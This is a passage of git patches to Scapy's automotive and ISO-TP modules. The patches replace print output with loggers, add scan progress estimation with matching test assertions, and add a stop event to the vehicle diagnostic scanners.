scapy.contrib.isotp.isotp_packet import ISOTP, ISOTPHeader, \ ISOTPHeaderEA, ISOTP_SF, ISOTP_FF, ISOTP_CF, ISOTP_FC from scapy.contrib.isotp.isotp_utils import ISOTPSession, \ - ISOTPMessageBuilder + ISOTPMessageBuilder, log_isotp from scapy.contrib.isotp.isotp_soft_socket import ISOTPSoftSocket from scapy.contrib.isotp.isotp_scanner import isotp_scan __all__ = ["ISOTP", "ISOTPHeader", "ISOTPHeaderEA", "ISOTP_SF", "ISOTP_FF", "ISOTP_CF", "ISOTP_FC", "ISOTPSoftSocket", "ISOTPSession", "ISOTPSocket", "ISOTPMessageBuilder", "isotp_scan", - "USE_CAN_ISOTP_KERNEL_MODULE"] + "USE_CAN_ISOTP_KERNEL_MODULE", "log_isotp"] USE_CAN_ISOTP_KERNEL_MODULE = False diff --git a/scapy/contrib/isotp/isotp_scanner.py b/scapy/contrib/isotp/isotp_scanner.py index 0aaf103842d..283f83f4e13 100644 --- a/scapy/contrib/isotp/isotp_scanner.py +++ b/scapy/contrib/isotp/isotp_scanner.py @@ -6,7 +6,7 @@ # scapy.contrib.description = ISO-TP (ISO 15765-2) Scanner Utility # scapy.contrib.status = library - +import logging import time from scapy.compat import Iterable, Optional, Union, List, Tuple, Dict @@ -17,6 +17,7 @@ from scapy.contrib.cansocket import PYTHON_CAN from scapy.contrib.isotp.isotp_packet import ISOTPHeader, ISOTPHeaderEA, \ ISOTP_FF, ISOTP +from scapy.contrib.isotp.isotp_utils import log_isotp def send_multiple_ext(sock, ext_id, packet, number_of_packets): @@ -65,15 +66,14 @@ def get_isotp_packet(identifier=0x0, extended=False, extended_can_id=False): return pkt -def filter_periodic_packets(packet_dict, verbose=False): - # type: (Dict[int, Tuple[Packet, int]], bool) -> None +def filter_periodic_packets(packet_dict): + # type: (Dict[int, Tuple[Packet, int]]) -> None """Filter to remove periodic packets from packet_dict ISOTP-Filter for periodic packets (same ID, always same time-gaps) Deletes periodic packets in packet_dict :param packet_dict: Dictionary, where the filter is applied - :param verbose: Displays further information """ filter_dict = {} # type: Dict[int, Tuple[List[int], List[Packet]]] @@ -95,9 +95,8 @@ def filter_periodic_packets(packet_dict, verbose=False): tg = [float(p1.time) - float(p2.time) for p1, p2 in zip(pkt_lst[1:], pkt_lst[:-1])] if all(abs(t1 - t2) < 0.001 for t1, t2 in zip(tg[1:], tg[:-1])): - if verbose: - print("[i] Identifier 0x%03x seems to be periodic. " - "Filtered.") + log_isotp.info( + "[i] Identifier 0x%03x seems to be periodic. Filtered.") for k in key_lst: del packet_dict[k] @@ -108,7 +107,6 @@ def get_isotp_fc( noise_ids, # type: Optional[List[int]] extended, # type: bool packet, # type: Packet - verbose=False # type: bool ): # type: (...) -> None """Callback for sniff function when packet received @@ -122,7 +120,6 @@ def get_isotp_fc( received during scan :param extended: boolean if extended scan :param packet: received packet - :param verbose: displays information during scan """ if packet.flags and packet.flags != "extended": return @@ -135,10 +132,9 @@ def get_isotp_fc( isotp_pci = orb(packet.data[index]) >> 4 isotp_fc = orb(packet.data[index]) & 0x0f if isotp_pci == 3 and 0 <= isotp_fc <= 2: - if verbose: - print("[+] Found flow-control frame from identifier 0x%03x" - " when testing identifier 0x%03x" % - (packet.identifier, id_value)) + log_isotp.debug("Found flow-control frame from identifier " + "0x%03x when testing identifier 0x%03x", + packet.identifier, id_value) if isinstance(id_list, dict): id_list[id_value] = (packet, packet.identifier) elif isinstance(id_list, list): @@ -149,8 +145,9 @@ def get_isotp_fc( if noise_ids is not None: noise_ids.append(packet.identifier) except Exception as e: - print("[!] Unknown message Exception: %s on packet: %s" % - (e, repr(packet))) + log_isotp.exception( + "Unknown message Exception: %s on packet: %s", + e, repr(packet)) def scan(sock, # type: SuperSocket @@ -159,7 +156,6 @@ def scan(sock, # type: SuperSocket sniff_time=0.1, # type: float extended_can_id=False, # type: bool verify_results=True, # type: bool - verbose=False # type: bool ): # type: (...) -> Dict[int, Tuple[Packet, int]] """Scan and return dictionary of detections @@ -175,7 +171,6 @@ def scan(sock, # type: SuperSocket :param extended_can_id: Send extended can frames :param verify_results: Verify scan results. This will cause a second scan of all possible candidates for ISOTP Sockets - :param verbose: displays information during scan :return: Dictionary with all found packets """ return_values = dict() # type: Dict[int, Tuple[Packet, int]] @@ -184,8 +179,7 @@ def scan(sock, # type: SuperSocket continue sock.send(get_isotp_packet(value, False, extended_can_id)) sock.sniff(prn=lambda pkt: get_isotp_fc(value, return_values, - noise_ids, False, pkt, - verbose), + noise_ids, False, pkt), timeout=sniff_time, store=False) if not verify_results: @@ -196,8 +190,7 @@ def scan(sock, # type: SuperSocket for value in range(max(0, tested_id - 2), tested_id + 2, 1): sock.send(get_isotp_packet(value, False, extended_can_id)) sock.sniff(prn=lambda pkt: get_isotp_fc(value, cleaned_ret_val, - noise_ids, False, pkt, - verbose), + noise_ids, False, pkt), timeout=sniff_time * 10, store=False) return cleaned_ret_val @@ -210,7 +203,6 @@ def scan_extended(sock, # type: SuperSocket noise_ids=None, # type: Optional[List[int]] sniff_time=0.1, # type: float extended_can_id=False, # type: bool - verbose=False # type: bool ): # type: (...) -> Dict[int, Tuple[Packet, int]] """Scan with ISOTP extended addresses and return dictionary of detections @@ -227,7 +219,6 @@ def scan_extended(sock, # type: SuperSocket :param sniff_time: time the scan waits for isotp flow control responses after sending a first frame :param extended_can_id: Send extended can frames - :param verbose: displays information during scan :return: Dictionary with all found packets """ return_values = dict() # type: Dict[int, Tuple[Packet, int]] @@ -244,8 +235,7 @@ def scan_extended(sock, # type: SuperSocket for ext_isotp_id in range(r[0], r[-1], scan_block_size): send_multiple_ext(sock, ext_isotp_id, pkt, scan_block_size) sock.sniff(prn=lambda p: get_isotp_fc(ext_isotp_id, id_list, - noise_ids, True, p, - verbose), + noise_ids, True, p), timeout=sniff_time * 3, store=False) # sleep to prevent flooding time.sleep(sniff_time) @@ -261,7 +251,7 @@ def scan_extended(sock, # type: SuperSocket sock.sniff(prn=lambda pkt: get_isotp_fc(full_id, return_values, noise_ids, True, - pkt, verbose), + pkt), timeout=sniff_time * 2, store=False) return return_values @@ -309,7 +299,9 @@ def isotp_scan(sock, # type: SuperSocket :return: """ if verbose: - print("Filtering background noise...") + log_isotp.setLevel(logging.DEBUG) + + log_isotp.info("Filtering background noise...") # Send dummy packet. In most cases, this triggers activity on the bus. @@ -327,17 +319,15 @@ def isotp_scan(sock, # type: SuperSocket extended_scan_range=extended_scan_range, noise_ids=noise_ids, sniff_time=sniff_time, - extended_can_id=extended_can_id, - verbose=verbose) + extended_can_id=extended_can_id) else: found_packets = scan(sock, scan_range, noise_ids=noise_ids, sniff_time=sniff_time, extended_can_id=extended_can_id, - verify_results=verify_results, - verbose=verbose) + verify_results=verify_results) - filter_periodic_packets(found_packets, verbose) + filter_periodic_packets(found_packets) if output_format == "text": return generate_text_output(found_packets, extended_addressing) diff --git a/scapy/contrib/isotp/isotp_soft_socket.py b/scapy/contrib/isotp/isotp_soft_socket.py index 42b99799500..812403bd59f 100644 --- a/scapy/contrib/isotp/isotp_soft_socket.py +++ b/scapy/contrib/isotp/isotp_soft_socket.py @@ -17,6 +17,7 @@ from scapy.compat import Optional, Union, List, Tuple, Any, Type, cast, \ Callable, TYPE_CHECKING +from scapy.contrib.isotp import log_isotp from scapy.packet import Packet from scapy.layers.can import CAN import scapy.libs.six as six @@ -534,12 +535,12 @@ def __init__(self, def failure_analysis(self): # type: () -> None - print("Failure analysis") - print("Last_rx_call: %s" % str(self.last_rx_call)) - print("self.rx_handle: %s" % self.rx_handle) - print("self.rx_handle._cb: %s" % self.rx_handle._cb) - print("self.rx_handle._when: %s" % self.rx_handle._when) - print("Now: %s" % TimeoutScheduler._time()) + log_isotp.debug("Failure analysis") + log_isotp.debug("Last_rx_call: %s", str(self.last_rx_call)) + log_isotp.debug("self.rx_handle: %s", str(self.rx_handle)) + log_isotp.debug("self.rx_handle._cb: %s", str(self.rx_handle._cb)) + log_isotp.debug("self.rx_handle._when: %s", str(self.rx_handle._when)) + log_isotp.debug("Now: %s", TimeoutScheduler._time()) def __del__(self): # type: () -> None diff --git a/scapy/contrib/isotp/isotp_utils.py b/scapy/contrib/isotp/isotp_utils.py index 05bddd3fc4c..dc57047f2f5 100644 --- a/scapy/contrib/isotp/isotp_utils.py +++ b/scapy/contrib/isotp/isotp_utils.py @@ -8,6 +8,7 @@ # scapy.contrib.description = ISO-TP (ISO 15765-2) Utilities # scapy.contrib.status = library +import logging import struct from scapy.compat import Iterable, Optional, Union, List, Tuple, Dict, Any, \ @@ -20,6 +21,9 @@ import scapy.libs.six as six +log_isotp = logging.getLogger("scapy.contrib.isotp") + + class ISOTPMessageBuilderIter(object): """ Iterator class for ISOTPMessageBuilder diff --git a/test/contrib/isotpscan.uts b/test/contrib/isotpscan.uts index a169d36feac..3ed6f9c80d5 100644 --- a/test/contrib/isotpscan.uts +++ b/test/contrib/isotpscan.uts @@ -6,6 +6,10 @@ = Imports from scapy.contrib.isotp.isotp_scanner import send_multiple_ext, filter_periodic_packets, scan_extended, scan from test.testsocket import TestSocket +from scapy.contrib.isotp.isotp_utils import log_isotp +import logging + +log_isotp.setLevel(logging.DEBUG) with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: exec(f.read()) @@ -78,7 +82,7 @@ for idx in range(1, 4): sockets.append(ISOTPSoftSocket(sock_recv, tx_id=0x700 + idx, rx_id=0x600 + idx)) found_packets = scan(sock_sender, range(0x5ff, 0x604), - noise_ids=[0x701], sniff_time=0.02, verbose=True) + noise_ids=[0x701], sniff_time=0.02) for s in sockets: s.close() From c95fe4d9716e9cf22dddc0a7ad5883850c60e16f Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sat, 13 Aug 2022 01:36:48 +0200 Subject: [PATCH 0864/1632] Add progress estimation to Automotive_Scanners (#3697) * Add progress estimation to Automotive_Scanners * fix python2 --- .../contrib/automotive/scanner/enumerator.py | 22 ++++++++++++++ scapy/contrib/automotive/scanner/executor.py | 25 +++++++++++++++- .../automotive/scanner/staged_test_case.py | 17 ++++++++++- .../automotive/scanner/uds_scanner.uts | 30 +++++++++++++++++++ 4 files changed, 92 insertions(+), 2 deletions(-) diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index 36674644569..b44039c538e 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -115,6 +115,7 @@ def __init__(self): self._retry_pkt = defaultdict( lambda: None) # type: Dict[EcuState, Optional[Union[Packet, Iterable[Packet]]]] # noqa: E501 self._negative_response_blacklist = [0x10, 0x11] # type: List[int] + self._requests_per_state_estimated = None # type: Optional[int] @staticmethod @abc.abstractmethod @@ -233,6 +234,25 @@ def _get_request_iterator(self, state, **kwargs): return chain(self._get_retry_iterator(state), self._get_initial_request_iterator(state, **kwargs)) + def _prepare_runtime_estimation(self, **kwargs): + # type: (Optional[Dict[str, Any]]) -> None + if self._requests_per_state_estimated is None: + try: + initial_requests = self._get_initial_requests(**kwargs) + self._requests_per_state_estimated = len(list(initial_requests)) + except NotImplementedError: + pass + + def runtime_estimation(self): + # type: () -> Optional[Tuple[int, int, float]] + if self._requests_per_state_estimated is None: + return None + + pkts_tbs = len(self.scanned_states) * self._requests_per_state_estimated + pkts_snt = len(self.results) + + return pkts_tbs, pkts_snt, float(pkts_snt) / pkts_tbs + def execute(self, socket, state, **kwargs): # type: (_SocketUnion, EcuState, Any) -> None self.check_kwargs(kwargs) @@ -240,6 +260,8 @@ def execute(self, socket, state, **kwargs): count = kwargs.pop('count', None) execution_time = kwargs.pop("execution_time", 1200) + self._prepare_runtime_estimation(**kwargs) + state_block_list = kwargs.get('state_block_list', list()) if state_block_list and state in state_block_list: diff --git a/scapy/contrib/automotive/scanner/executor.py b/scapy/contrib/automotive/scanner/executor.py index befdc88c08f..0c47129d21e 100644 --- a/scapy/contrib/automotive/scanner/executor.py +++ b/scapy/contrib/automotive/scanner/executor.py @@ -201,6 +201,15 @@ def execute_test_case(self, test_case, kill_time=None): self.check_new_states(test_case) self.check_new_testcases(test_case) + if hasattr(test_case, "runtime_estimation"): + estimation = test_case.runtime_estimation() # type: ignore + if estimation is not None: + log_automotive.debug( + "[i] Test_case %s: TODO %d, " + "DONE %d, TOTAL %0.2f", + test_case.__class__.__name__, estimation[0], + estimation[1], estimation[2]) + def check_new_testcases(self, test_case): # type: (AutomotiveTestCaseABC) -> None if isinstance(test_case, TestCaseGenerator): @@ -225,6 +234,19 @@ def validate_test_case_kwargs(self): test_case_kwargs = self.configuration[test_case.__class__.__name__] test_case.check_kwargs(test_case_kwargs) + def progress(self): + # type: () -> float + progress = [] + for tc in self.configuration.test_cases: + if not hasattr(tc, "runtime_estimation"): + continue + est = tc.runtime_estimation() # type: ignore + if est is None: + continue + progress.append(est[2]) + + return sum(progress) / len(progress) if len(progress) else 0.0 + def scan(self, timeout=None): # type: (Optional[int]) -> None """ @@ -236,7 +258,8 @@ def scan(self, timeout=None): log_automotive.debug("Set kill_time to %s" % time.ctime(kill_time)) while kill_time > time.time(): test_case_executed = False - log_automotive.debug("Scan paths %s", self.state_paths) + log_automotive.info("[i] Scan progress %0.2f", self.progress()) + log_automotive.debug("[i] Scan paths %s", self.state_paths) for p, test_case in product( self.state_paths, self.configuration.test_cases): log_automotive.info("Scan path %s", p) diff --git a/scapy/contrib/automotive/scanner/staged_test_case.py b/scapy/contrib/automotive/scanner/staged_test_case.py index e6b6a4debd8..dc7a6361707 100644 --- a/scapy/contrib/automotive/scanner/staged_test_case.py +++ b/scapy/contrib/automotive/scanner/staged_test_case.py @@ -8,7 +8,7 @@ from scapy.compat import Any, List, Optional, Dict, Callable, cast, \ - TYPE_CHECKING + TYPE_CHECKING, Tuple from scapy.contrib.automotive import log_automotive from scapy.contrib.automotive.scanner.graph import _Edge from scapy.contrib.automotive.ecu import EcuState, EcuResponse, Ecu @@ -249,3 +249,18 @@ def supported_responses(self): supported_responses.sort(key=Ecu.sort_key_func) return supported_responses + + def runtime_estimation(self): + # type: () -> Optional[Tuple[int, int, float]] + + if hasattr(self.current_test_case, "runtime_estimation"): + cur_est = self.current_test_case.runtime_estimation() # type: ignore + if cur_est: + return len(self.test_cases), \ + self.__stage_index, \ + float(self.__stage_index) / len(self.test_cases) + \ + cur_est[2] / len(self.test_cases) + + return len(self.test_cases), \ + self.__stage_index, \ + float(self.__stage_index) / len(self.test_cases) diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index 68bfa3992cb..2fdb7f9acb0 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -196,6 +196,7 @@ scanner = executeScannerInVirtualEnvironment( scanner.show_testcases() assert len(scanner.state_paths) == 5 assert scanner.scan_completed +assert scanner.progress() > 0.95 assert EcuState(session=1) in scanner.final_states assert EcuState(session=2, tp=1) in scanner.final_states @@ -266,6 +267,7 @@ scanner = executeScannerInVirtualEnvironment( resps, es, UDS_RDBIEnumerator_kwargs={"scan_range": range(0x100)}) assert scanner.scan_completed +assert scanner.progress() > 0.95 tc = scanner.configuration.test_cases[0] assert len(tc.results_without_response) < 10 @@ -336,6 +338,8 @@ es = [UDS_RDBISelectiveEnumerator] scanner = executeScannerInVirtualEnvironment(resps, es, UDS_RDBIRandomEnumerator_kwargs={"probe_start": 0, "probe_end": 0x500}) assert scanner.scan_completed +assert scanner.progress() > 0.95 + tc = scanner.configuration.stages[0][0] tc.show() @@ -349,6 +353,8 @@ assert len(tc.results_with_positive_response) >= 1 assert len(tc.scanned_states) == 1 assert scanner.scan_completed +assert scanner.progress() > 0.95 + tc = scanner.configuration.stages[0][1] tc.show() @@ -410,6 +416,8 @@ scanner = executeScannerInVirtualEnvironment( resps, es, UDS_RDBIEnumerator_kwargs={"scan_range": range(0x100)}) assert scanner.scan_completed +assert scanner.progress() > 0.95 + tc = scanner.configuration.stages[0][0] assert len(tc.results_without_response) < 10 @@ -489,6 +497,8 @@ scanner = executeScannerInVirtualEnvironment( resps, es, UDS_RDBIEnumerator_kwargs={"scan_range": range(0x100)}) assert scanner.scan_completed +assert scanner.progress() > 0.95 + tc = scanner.configuration.test_cases[0][0] assert len(tc.results_without_response) < 10 @@ -545,6 +555,8 @@ es = [UDS_TPEnumerator] scanner = executeScannerInVirtualEnvironment(resps, es) assert scanner.scan_completed +assert scanner.progress() > 0.95 + tc = scanner.configuration.test_cases[0] assert len(tc.results_without_response) < 10 @@ -568,6 +580,8 @@ es = [UDS_EREnumerator] scanner = executeScannerInVirtualEnvironment(resps, es) assert scanner.scan_completed +assert scanner.progress() > 0.95 + tc = scanner.configuration.test_cases[0] assert len(tc.results_without_response) < 10 @@ -601,6 +615,8 @@ es = [UDS_CCEnumerator] scanner = executeScannerInVirtualEnvironment(resps, es) assert scanner.scan_completed +assert scanner.progress() > 0.95 + tc = scanner.configuration.test_cases[0] assert len(tc.results_without_response) < 10 @@ -636,6 +652,8 @@ es = [UDS_RDBPIEnumerator] scanner = executeScannerInVirtualEnvironment(resps, es) assert scanner.scan_completed +assert scanner.progress() > 0.95 + tc = scanner.configuration.test_cases[0] assert len(tc.results_without_response) < 10 @@ -673,6 +691,8 @@ es = [UDS_RCEnumerator] scanner = executeScannerInVirtualEnvironment(resps, es, UDS_RCEnumerator_kwargs={"scan_range": range(0x11)}) assert scanner.scan_completed +assert scanner.progress() > 0.95 + tc = scanner.configuration.test_cases[0] assert len(tc.results_without_response) < 10 @@ -708,6 +728,8 @@ es = [UDS_RCSelectiveEnumerator] scanner = executeScannerInVirtualEnvironment(resps, es, UDS_RCStartEnumerator_kwargs={"scan_range": range(0x11)}) assert scanner.scan_completed +assert scanner.progress() > 0.95 + tc = scanner.configuration.stages[0][0] assert len(tc.results_without_response) < 10 @@ -758,6 +780,8 @@ es = [UDS_IOCBIEnumerator] scanner = executeScannerInVirtualEnvironment(resps, es, UDS_IOCBIEnumerator_kwargs={"scan_range": range(0x100)}) assert scanner.scan_completed +assert scanner.progress() > 0.95 + tc = scanner.configuration.test_cases[0] assert len(tc.results_without_response) < 10 @@ -814,6 +838,8 @@ scanner = executeScannerInVirtualEnvironment( UDS_RDEnumerator_kwargs={"unittest": True}) assert scanner.scan_completed +assert scanner.progress() > 0.95 + tc1 = scanner.configuration.test_cases[0] assert len(tc1.results_without_response) < 10 @@ -936,6 +962,8 @@ es = [UDS_TDEnumerator] scanner = executeScannerInVirtualEnvironment(resps, es) assert scanner.scan_completed +assert scanner.progress() > 0.95 + tc = scanner.configuration.test_cases[0] assert len(tc.results_without_response) < 10 @@ -971,6 +999,8 @@ es = [BMW_DevJobEnumerator] scanner = executeScannerInVirtualEnvironment(resps, es, BMW_DevJobEnumerator_kwargs={"scan_range": range(0xFF00, 0x10000)}) assert scanner.scan_completed +assert scanner.progress() > 0.95 + tc = scanner.configuration.test_cases[0] assert len(tc.results_without_response) < 10 From 980525698d31e65672007e27a7d5c6b3f69a188e Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sun, 14 Aug 2022 02:05:41 +0200 Subject: [PATCH 0865/1632] Add stop event to automotive scanners to trigger async stop (#3714) * Minor cleanups of Automotive Scanner * fix flake * Add stop event to automotive scanners to trigger async stop * Add stop event to automotive scanners to trigger async stop * Fix ChainCC in isotpScan * Add stop event to automotive scanners to trigger async stop * isotp_log cleanup * Further logging cleanups * fix log_isotp * fix log_isotp * debug gmlan scanner errors on windows * fix stupid change --- scapy/contrib/automotive/gm/gmlan.py | 26 ++++--- scapy/contrib/automotive/gm/gmlan_scanner.py | 5 +- scapy/contrib/automotive/gm/gmlanutils.py | 31 ++++----- scapy/contrib/automotive/obd/obd.py | 12 ++-- .../contrib/automotive/scanner/enumerator.py | 12 +++- scapy/contrib/automotive/scanner/executor.py | 17 ++++- scapy/contrib/automotive/uds_scan.py | 1 + .../automotive/xcp/cto_commands_slave.py | 9 ++- scapy/contrib/automotive/xcp/utils.py | 11 +-- scapy/contrib/isotp/__init__.py | 6 +- scapy/contrib/isotp/isotp_native_socket.py | 20 +++--- scapy/contrib/isotp/isotp_packet.py | 13 ++-- scapy/contrib/isotp/isotp_scanner.py | 15 ++-- scapy/contrib/isotp/isotp_soft_socket.py | 69 ++++++++++--------- test/contrib/automotive/gm/scanner.uts | 28 +++++--- test/contrib/isotp_soft_socket.uts | 1 + 16 files changed, 162 insertions(+), 114 deletions(-) diff --git a/scapy/contrib/automotive/gm/gmlan.py b/scapy/contrib/automotive/gm/gmlan.py index 95eea114f0e..cc185d73ceb 100644 --- a/scapy/contrib/automotive/gm/gmlan.py +++ b/scapy/contrib/automotive/gm/gmlan.py @@ -8,16 +8,16 @@ # scapy.contrib.status = loads import struct + +from scapy.contrib.automotive import log_automotive from scapy.fields import ObservableDict, XByteEnumField, ByteEnumField, \ ConditionalField, XByteField, StrField, XShortEnumField, XShortField, \ X3BytesField, XIntField, ShortField, PacketField, PacketListField, \ FieldListField, MultipleTypeField, StrFixedLenField from scapy.packet import Packet, bind_layers, NoPayload from scapy.config import conf -from scapy.error import warning, log_loading from scapy.contrib.isotp import ISOTP - """ GMLAN """ @@ -26,11 +26,11 @@ if conf.contribs['GMLAN']['treat-response-pending-as-answer']: pass except KeyError: - log_loading.info("Specify \"conf.contribs['GMLAN'] = " - "{'treat-response-pending-as-answer': True}\" to treat " - "a negative response 'RequestCorrectlyReceived-" - "ResponsePending' as answer of a request. \n" - "The default value is False.") + log_automotive.info("Specify \"conf.contribs['GMLAN'] = " + "{'treat-response-pending-as-answer': True}\" to treat " + "a negative response 'RequestCorrectlyReceived-" + "ResponsePending' as answer of a request. \n" + "The default value is False.") conf.contribs['GMLAN'] = {'treat-response-pending-as-answer': False} conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = None @@ -40,12 +40,14 @@ class GMLAN(ISOTP): @staticmethod def determine_len(x): if conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] is None: - warning("Define conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme']! " # noqa: E501 - "Assign either 2,3 or 4") + log_automotive.warning( + "Define conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme']! " + "Assign either 2,3 or 4") if conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] \ not in [2, 3, 4]: - warning("Define conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme']! " # noqa: E501 - "Assign either 2,3 or 4") + log_automotive.warning( + "Define conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme']! " + "Assign either 2,3 or 4") return conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] == x services = ObservableDict( @@ -671,6 +673,8 @@ class GMLAN_RDI_BC(Packet): bind_layers(GMLAN_RDI, GMLAN_RDI_BC, subfunction=0x82) + + # TODO:This function receive single frame responses... (Implement GMLAN Socket) diff --git a/scapy/contrib/automotive/gm/gmlan_scanner.py b/scapy/contrib/automotive/gm/gmlan_scanner.py index 572bff6f516..30ddca5d9b6 100644 --- a/scapy/contrib/automotive/gm/gmlan_scanner.py +++ b/scapy/contrib/automotive/gm/gmlan_scanner.py @@ -20,7 +20,7 @@ import scapy.libs.six as six from scapy.config import conf from scapy.supersocket import SuperSocket -from scapy.error import Scapy_Exception, warning +from scapy.error import Scapy_Exception from scapy.contrib.automotive.gm.gmlanutils import GMLAN_InitDiagnostics, \ GMLAN_TesterPresentSender from scapy.contrib.automotive.gm.gmlan import GMLAN, GMLAN_SA, GMLAN_RD, \ @@ -685,7 +685,8 @@ def show(self, dump=False, filtered=True, verbose=False): ih.tofile("RMBA_dump.hex", format="hex") except ImportError: - warning("Install 'intelhex' to create a hex file of the memory") + log_automotive.warning( + "Install 'intelhex' to create a hex file of the memory") if dump and s is not None: return s + "\n" diff --git a/scapy/contrib/automotive/gm/gmlanutils.py b/scapy/contrib/automotive/gm/gmlanutils.py index d4c070a262f..27901297bbc 100644 --- a/scapy/contrib/automotive/gm/gmlanutils.py +++ b/scapy/contrib/automotive/gm/gmlanutils.py @@ -18,7 +18,6 @@ from scapy.packet import Packet from scapy.supersocket import SuperSocket from scapy.contrib.isotp import ISOTPSocket -from scapy.error import warning, log_loading from scapy.utils import PeriodicSenderThread __all__ = ["GMLAN_TesterPresentSender", "GMLAN_InitDiagnostics", @@ -26,11 +25,10 @@ "GMLAN_TransferData", "GMLAN_TransferPayload", "GMLAN_ReadMemoryByAddress", "GMLAN_BroadcastSocket"] - -log_loading.info("\"conf.contribs['GMLAN']" - "['treat-response-pending-as-answer']\" set to True). This " - "is required by the GMLAN-Utils module to operate " - "correctly.") +log_automotive.info("\"conf.contribs['GMLAN']" + "['treat-response-pending-as-answer']\" set to True). This " + "is required by the GMLAN-Utils module to operate " + "correctly.") try: conf.contribs['GMLAN']['treat-response-pending-as-answer'] = False except KeyError: @@ -88,6 +86,7 @@ def GMLAN_InitDiagnostics( :param unittest: disable delays :return: True on success else False """ + # Helper function def _send_and_check_response(sock, req, timeout): # type: (SuperSocket, Packet, int) -> bool @@ -158,7 +157,7 @@ def GMLAN_GetSecurityAccess( return False if level % 2 == 0: - warning("Parameter Error: Level must be an odd number.") + log_automotive.warning("Parameter Error: Level must be an odd number.") return False while retry >= 0: @@ -251,9 +250,9 @@ def GMLAN_TransferData( startretry = retry scheme = conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] - if addr < 0 or addr >= 2**(8 * scheme): - warning("Error: Invalid address %s for scheme %s", - hex(addr), str(scheme)) + if addr < 0 or addr >= 2 ** (8 * scheme): + log_automotive.warning("Error: Invalid address %s for scheme %s", + hex(addr), str(scheme)) return False # max size of dataRecord according to gmlan protocol @@ -332,16 +331,16 @@ def GMLAN_ReadMemoryByAddress( retry = abs(retry) scheme = conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] - if addr < 0 or addr >= 2**(8 * scheme): - warning("Error: Invalid address %s for scheme %s", - hex(addr), str(scheme)) + if addr < 0 or addr >= 2 ** (8 * scheme): + log_automotive.warning("Error: Invalid address %s for scheme %s", + hex(addr), str(scheme)) return None # max size of dataRecord according to gmlan protocol if length <= 0 or length > (4094 - scheme): - warning("Error: Invalid length %s for scheme %s. " - "Choose between 0x1 and %s", - hex(length), str(scheme), hex(4094 - scheme)) + log_automotive.warning("Error: Invalid length %s for scheme %s. " + "Choose between 0x1 and %s", + hex(length), str(scheme), hex(4094 - scheme)) return None while retry >= 0: diff --git a/scapy/contrib/automotive/obd/obd.py b/scapy/contrib/automotive/obd/obd.py index 7c1be039bab..2256ed711d2 100644 --- a/scapy/contrib/automotive/obd/obd.py +++ b/scapy/contrib/automotive/obd/obd.py @@ -9,13 +9,13 @@ import struct +from scapy.contrib.automotive import log_automotive from scapy.contrib.automotive.obd.iid.iids import * from scapy.contrib.automotive.obd.mid.mids import * from scapy.contrib.automotive.obd.pid.pids import * from scapy.contrib.automotive.obd.tid.tids import * from scapy.contrib.automotive.obd.services import * from scapy.packet import bind_layers, NoPayload -from scapy.error import log_loading from scapy.config import conf from scapy.fields import XByteEnumField from scapy.contrib.isotp import ISOTP @@ -24,11 +24,11 @@ if conf.contribs['OBD']['treat-response-pending-as-answer']: pass except KeyError: - log_loading.info("Specify \"conf.contribs['OBD'] = " - "{'treat-response-pending-as-answer': True}\" to treat " - "a negative response 'requestCorrectlyReceived-" - "ResponsePending' as answer of a request. \n" - "The default value is False.") + log_automotive.info("Specify \"conf.contribs['OBD'] = " + "{'treat-response-pending-as-answer': True}\" to treat " + "a negative response 'requestCorrectlyReceived-" + "ResponsePending' as answer of a request. \n" + "The default value is False.") conf.contribs['OBD'] = {'treat-response-pending-as-answer': False} diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index b44039c538e..114bf641c98 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -8,6 +8,7 @@ import abc +import threading import time import copy from collections import defaultdict, OrderedDict @@ -63,6 +64,7 @@ class ServiceEnumerator(AutomotiveTestCase): 'exit_if_service_not_supported': (bool, None), 'exit_scan_on_first_negative_response': (bool, None), 'retry_if_busy_returncode': (bool, None), + 'stop_event': (threading._Event if six.PY2 else threading.Event, None), # type: ignore # noqa: E501 'debug': (bool, None), 'scan_range': ((list, tuple, range), None), 'unittest': (bool, None) @@ -103,6 +105,7 @@ class ServiceEnumerator(AutomotiveTestCase): the 'busyRepeatRequest' negative response code is received. :param bool debug: Enables debug functions during execute. + :param Event stop_event: Signals immediate stop of the execution. :param scan_range: Specifies the identifiers to be scanned. :type scan_range: list or tuple or range or iterable""" @@ -259,6 +262,7 @@ def execute(self, socket, state, **kwargs): timeout = kwargs.pop('timeout', 1) count = kwargs.pop('count', None) execution_time = kwargs.pop("execution_time", 1200) + stop_event = kwargs.pop("stop_event", None) # type: Optional[threading.Event] # noqa: E501 self._prepare_runtime_estimation(**kwargs) @@ -308,6 +312,11 @@ def execute(self, socket, state, **kwargs): time.ctime()) return + if stop_event is not None and stop_event.is_set(): + log_automotive.info( + "Stop test_case execution because of stop event") + return + log_automotive.info("Finished iterator execution") self._state_completed[state] = True log_automotive.debug("States completed %s", @@ -318,7 +327,8 @@ def execute(self, socket, state, **kwargs): def sr1_with_retry_on_error(self, req, socket, state, timeout): # type: (Packet, _SocketUnion, EcuState, int) -> Optional[Packet] try: - res = socket.sr1(req, timeout=timeout, verbose=False, chainEX=True) + res = socket.sr1(req, timeout=timeout, verbose=False, + chainEX=True, chainCC=True) except (OSError, ValueError, Scapy_Exception) as e: if not self._populate_retry(state, req): log_automotive.exception( diff --git 